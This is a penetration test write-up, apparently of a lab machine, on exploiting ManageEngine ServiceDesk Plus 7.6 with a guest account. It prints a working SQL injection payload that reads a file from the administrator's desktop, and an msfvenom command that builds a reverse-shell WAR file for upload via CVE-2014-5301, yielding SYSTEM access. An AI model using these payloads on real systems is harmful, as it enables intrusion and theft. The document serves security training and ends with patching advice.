Pentest report on Helpdesk

Executive Summary

Helpdesk is a Windows 2008 Standard server which hosts ManageEngine ServiceDesk Plus (SDP) 7.6 web application, the ManageEngine SDP version suffers from multiple vulnerabilities, amongst multiple vulnerabilities we used two exploits.

  • Sql injection – We are able to read proof.txt from C:\Users\Administrator\Desktop\
  • Arbitrary file upload – We uploaded a malicious reverse shell java war file to gain access and got administrative privilege on Helpdesk.

the above two exploits were achieved with just a guest account.


It is recommended to patch ManageEngine ServiceDesk Plus to the latest version, disable guest account if not needed, if guest account is needed check with ManageEngine if change of username and password is viable.

Service Enumeration

3389Remote Desktop
8080ManageEngine ServiceDesk

Vulnerability exploited

SQL injection

To perform the exploits we first logon to ManageEngine SDP as guest, the account name and the password are the same.

Logon as guest
The guest account interface

The original PoC can be reference at:

This is the modified PoC:

http://192.168.x.43:8080/ select 1,2,3,4,5,6,7,":",load_file("c:\\users\\administrator\\desktop\\proof.txt"),":",11,12,13,14,15,16,17,18,19,1 into dumpfile 'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\loot.txt'/*

The PoC abuses MySQL query to write query result into a file – loot.txt, the query uses load_file function to read proof.txt and saves to loot.txt.

To view the content navigate to http://192.168.x.43:8080/images/loot.txt

the content is in the middle section separated by colons.

SQL injection is possible because the woID is not properly sanitized.

Arbitrary File upload

The reference of the vulnerability can be found in CVE-2014-5301. The directory traversal vulnerability is exploited to upload any file a person wishes to.

The directory traversal can be traverse to the jboss path (../../server/default/deploy) which directly deploys and executes java war file, a post request is made to /common/FileAttachment.jsp then the war file is uploaded to the jboss path and executes.

An automated python script is available to exploit this vulnerability:

First generate a malicious java war file with msfvenom:

msfvenom -p java/shell/reverse_tcp lhost=192.168.x.x lport=8080 -f war -o shell.war

This war file will send connection to a multi handler server which I set up.

Multi handler server to receive staging connection.

Then run the python script to upload shell.war to Helpdesk.

./ 192.168.x.43 8080 guest guest shell.war
Execute the python script
Reverse connection is established.

The ManageEngine SDP was started with administrative rights (NT authority\System) and hence I can easily navigate to C:\Users\Administrator\Desktop\proof.txt.

Obtain proof.txt

Obtained proof.txt

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s